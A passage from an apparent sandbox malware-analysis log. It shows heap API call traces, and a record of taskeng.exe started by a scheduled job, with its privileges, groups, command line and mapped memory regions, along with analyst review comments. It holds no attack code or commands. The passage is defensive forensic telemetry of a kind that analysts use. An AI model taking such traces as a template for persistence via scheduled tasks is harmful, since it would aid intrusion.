[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5308) returned 0x14
[0170.770] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5308 | out: hHeap=0x4e0000) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cd8) returned 1
[0170.770] GetProcessHeap () returned 0x4e0000
[0170.770] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4cd8) returned 0x10
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4cd8 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50f0) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f50f0) returned 0x14
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50f0 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5348) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5348) returned 0x16
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5348 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ca8) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4ca8) returned 0x10
[0170.771] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ca8 | out: hHeap=0x4e0000) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50d0) returned 1
[0170.771] GetProcessHeap () returned 0x4e0000
[0170.771] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f50d0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50d0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fa0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4fa0) returned 0x2
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fa0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fb0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4fb0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fb0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fd0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4fd0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4fd0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ff0) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.772] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4ff0) returned 0x14
[0170.772] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4ff0 | out: hHeap=0x4e0000) returned 1
[0170.772] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5010) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5010) returned 0x14
[0170.773] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5010 | out: hHeap=0x4e0000) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52a8) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f52a8) returned 0x14
[0170.773] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52a8 | out: hHeap=0x4e0000) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52c8) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f52c8) returned 0x14
[0170.773] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52c8 | out: hHeap=0x4e0000) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6930) returned 1
[0170.773] GetProcessHeap () returned 0x4e0000
[0170.773] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6930) returned 0x30
[0170.774] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6930 | out: hHeap=0x4e0000) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52e8) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f52e8) returned 0x14
[0170.774] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f52e8 | out: hHeap=0x4e0000) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968) returned 1
[0170.774] GetProcessHeap () returned 0x4e0000
[0170.774] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f6968) returned 0x30
[0170.775] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f6968 | out: hHeap=0x4e0000) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5388) returned 0x14
[0170.775] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5388 | out: hHeap=0x4e0000) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x504d58) returned 1
[0170.775] GetProcessHeap () returned 0x4e0000
[0170.775] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x504d58) returned 0x82
[0170.776] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x504d58 | out: hHeap=0x4e0000) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5748) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5748) returned 0x14
[0170.776] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5748 | out: hHeap=0x4e0000) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bd0) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4bd0) returned 0x10
[0170.776] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bd0 | out: hHeap=0x4e0000) returned 1
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] GetProcessHeap () returned 0x4e0000
[0170.776] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5030) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5030) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5030 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5050) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5050) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5050 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5070) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5070) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5070 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5090) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5090) returned 0x14
[0170.777] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5090 | out: hHeap=0x4e0000) returned 1
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.777] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4be8) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4be8) returned 0x10
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4be8 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50b0) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f50b0) returned 0x14
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f50b0 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5128) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5128) returned 0x14
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5128 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5168) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5168) returned 0x14
[0170.778] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5168 | out: hHeap=0x4e0000) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51a8) returned 1
[0170.778] GetProcessHeap () returned 0x4e0000
[0170.778] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f51a8) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51a8 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51c8) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f51c8) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f51c8 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5268) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5268) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5268 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c00) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4c00) returned 0x10
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4c00 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5148) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f5148) returned 0x14
[0170.779] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f5148 | out: hHeap=0x4e0000) returned 1
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] GetProcessHeap () returned 0x4e0000
[0170.779] HeapValidate (hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bb8) returned 1
[0170.780] GetProcessHeap () returned 0x4e0000
[0170.780] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f4bb8) returned 0x10
[0170.780] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f4bb8 | out: hHeap=0x4e0000) returned 1
[0170.780] exit (_Code=0)
Thread:
id = 36
os_tid = 0x954
Process:
# Analyst note: this taskeng.exe instance is the Task Scheduler host. Per
# monitor_reason below, the sandbox started tracking it because of a scheduled
# job, and the process record with id = "8" later in this log names it as its
# parent (parent_id = "7", os_parent_pid = "0x4d0").
id = "7"
image_name = "taskeng.exe"
filename = "c:\\windows\\system32\\taskeng.exe"
page_root = "0x1f977000"
os_pid = "0x4d0"
# 0x2000 is the medium mandatory integrity level; the analysis target at the
# top of this log ran at 0x3000 (high).
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "created_scheduled_job"
parent_id = "6"
os_parent_pid = "0x34c"
cmd_line = "taskeng.exe {6D9545EF-31E1-4286-8B8C-42C7F98001F2} S-1-5-21-4219442223-4223814209-3835049652-1000:Q9IATRKPRH\\kEecfMwgj:Interactive:LUA[1]"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
# NOTE(review): the regions recorded for this process are mapped above 4 GiB
# and no wow64*.dll appears among them, so the image looks 64-bit despite
# bitness = "32" - confirm how the analyzer derives this field before relying on it.
bitness = "32"
# NOTE(review): BUILTIN\Administrators carries [0x10] here versus [0xf] for the
# analysis target. Presumably the bracketed value is the SID attribute mask, in
# which case 0x10 is SE_GROUP_USE_FOR_DENY_ONLY (a filtered, non-elevated token) - confirm.
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f343" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2281
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2282
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2283
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2284
start_va = 0x190000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 2285
start_va = 0x772b0000
end_va = 0x77458fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2286
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2287
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2288
start_va = 0xff420000
end_va = 0xff493fff
monitored = 0
entry_point = 0xff42f44c
region_type = mapped_file
name = "taskeng.exe"
filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")
Region:
id = 2289
start_va = 0x7feff5d0000
end_va = 0x7feff5d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2290
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2291
start_va = 0x7fffffd4000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 2292
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2423
start_va = 0x210000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2424
start_va = 0x77190000
end_va = 0x772aefff
monitored = 0
entry_point = 0x771a5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2425
start_va = 0x7fefd2d0000
end_va = 0x7fefd33bfff
monitored = 0
entry_point = 0x7fefd2d2780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2426
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2427
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2428
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2429
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2430
start_va = 0x77090000
end_va = 0x77189fff
monitored = 0
entry_point = 0x770aa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2431
start_va = 0x7feff1e0000
end_va = 0x7feff246fff
monitored = 0
entry_point = 0x7feff1eb03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2432
start_va = 0x7fefed60000
end_va = 0x7fefed6dfff
monitored = 0
entry_point = 0x7fefed61080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2433
start_va = 0x7fefdce0000
end_va = 0x7fefdda8fff
monitored = 0
entry_point = 0x7fefdd5a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2434
start_va = 0x7fefd8b0000
end_va = 0x7fefd94efff
monitored = 0
entry_point = 0x7fefd8b25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2435
start_va = 0x7fefd5d0000
end_va = 0x7fefd7d2fff
monitored = 0
entry_point = 0x7fefd5f3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2436
start_va = 0x7feff250000
end_va = 0x7feff37cfff
monitored = 0
entry_point = 0x7feff29ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2437
start_va = 0x7feff380000
end_va = 0x7feff456fff
monitored = 0
entry_point = 0x7feff383274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2438
start_va = 0x7fefa790000
end_va = 0x7fefa799fff
monitored = 0
entry_point = 0x7fefa79260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 2439
start_va = 0x7fefcd20000
end_va = 0x7fefcd8cfff
monitored = 0
entry_point = 0x7fefcd21010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2440
start_va = 0x380000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 2441
start_va = 0x380000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 2442
start_va = 0x520000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 2443
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2444
start_va = 0x530000
end_va = 0x6b7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 2445
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2446
start_va = 0x7feff1b0000
end_va = 0x7feff1ddfff
monitored = 0
entry_point = 0x7feff1b1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2447
start_va = 0x7fefd9f0000
end_va = 0x7fefdaf8fff
monitored = 0
entry_point = 0x7fefd9f1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2448
start_va = 0x6c0000
end_va = 0x840fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006c0000"
filename = ""
Region:
id = 2449
start_va = 0x850000
end_va = 0x1c4ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000850000"
filename = ""
Region:
id = 2450
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskeng.exe.mui"
filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui")
Region:
id = 2451
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2452
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2453
start_va = 0x1c50000
end_va = 0x1deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 2454
start_va = 0xe0000
end_va = 0x15cfff
monitored = 0
entry_point = 0xecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2455
start_va = 0xe0000
end_va = 0x15cfff
monitored = 0
entry_point = 0xecec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2456
start_va = 0x7fefd0f0000
end_va = 0x7fefd0fefff
monitored = 0
entry_point = 0x7fefd0f1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2457
start_va = 0x7feff190000
end_va = 0x7feff1aefff
monitored = 0
entry_point = 0x7feff1960e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2458
start_va = 0x480000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2459
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 2460
start_va = 0x7feff460000
end_va = 0x7feff53afff
monitored = 0
entry_point = 0x7feff480760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2461
